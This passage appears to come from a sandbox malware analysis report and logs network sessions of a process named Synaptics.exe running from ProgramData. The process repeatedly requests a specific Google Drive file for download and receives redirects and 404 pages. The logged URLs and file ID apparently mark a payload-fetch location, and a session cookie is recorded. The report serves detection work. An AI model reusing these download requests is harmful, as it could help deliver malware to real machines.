                                                                                                            Connection: close
                                                                                                            2024-11-15 10:24:43 UTC125INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width
                                                                                                            2024-11-15 10:24:43 UTC1378INData Raw: 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 61 45 66 38 45 70 49 68 45 65 74 35 42 72 68 4a 58 2d 4c 71 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69
                                                                                                            Data Ascii: "><title>Error 404 (Not Found)!!1</title><style nonce="OaEf8EpIhEet5BrhJX-Lqg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;mi
                                                                                                            2024-11-15 10:24:43 UTC149INData Raw: 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            47192.168.2.1649792142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:42 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:43 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:42 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Q5DF4Vd6CydPuIhMSvt_Ng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            48192.168.2.1649791142.250.185.654436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:42 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:43 UTC1253INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:43 GMT
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-DePdxBrWSkSAIdJ0sgC5jg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AHmUCY1Ka-ayYgy0gFTLLMc0oDM5XwWrGj7J1AfZzthJRsamnkaOpvBCd8ybDPbmOA9QUBBiF1PnKsDOMg
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:24:43 UTC125INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width
                                                                                                            2024-11-15 10:24:43 UTC1378INData Raw: 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 46 50 4a 50 54 6a 47 64 78 5a 76 4f 41 37 54 4f 47 44 6e 69 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69
                                                                                                            Data Ascii: "><title>Error 404 (Not Found)!!1</title><style nonce="hFPJPTjGdxZvOA7TOGDniQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;mi
                                                                                                            2024-11-15 10:24:43 UTC149INData Raw: 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            49192.168.2.1649793142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:43 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:44 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:44 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-39CcpOOLSvI49LexHOX3Sw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            50192.168.2.1649795142.250.185.654436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:44 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:44 UTC1253INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:44 GMT
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-EfU79X79u7E4LbcOEOBvKg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AHmUCY2kNgbFRD3DrajNVR7pKKXqnrwQIaRfV-7W54qyac6MQopila7ozQVqExmAJIQV9H6NBjrZyRUUJQ
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:24:44 UTC125INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width
                                                                                                            2024-11-15 10:24:44 UTC1378INData Raw: 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 73 79 68 58 59 32 4e 41 71 4a 35 58 76 6b 6a 37 39 6e 69 4b 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69
                                                                                                            Data Ascii: "><title>Error 404 (Not Found)!!1</title><style nonce="8syhXY2NAqJ5Xvkj79niKA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;mi
                                                                                                            2024-11-15 10:24:44 UTC149INData Raw: 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            51192.168.2.1649794142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:44 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:44 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:44 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-fN-d9vjiQ2nKkQC7eUz0kA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            52192.168.2.1649796142.250.185.654436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:44 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:44 UTC1253INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:44 GMT
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-BZb41KUFe5fWsptmquap-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AFiumC66h55eqZ_-Meiab5NlnUvBU2DlY0k5vm1dRiGOkMs7WrRwUFaSgZmBgB7Ab-bFDOfwYpgyiAYMCA
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:24:44 UTC125INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width
                                                                                                            2024-11-15 10:24:44 UTC1378INData Raw: 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 57 32 4e 79 38 6c 35 58 5a 7a 45 4e 62 31 4a 77 4b 66 32 46 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69
                                                                                                            Data Ascii: "><title>Error 404 (Not Found)!!1</title><style nonce="-W2Ny8l5XZzENb1JwKf2FQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;mi
                                                                                                            2024-11-15 10:24:44 UTC149INData Raw: 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            53192.168.2.1649802142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:45 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
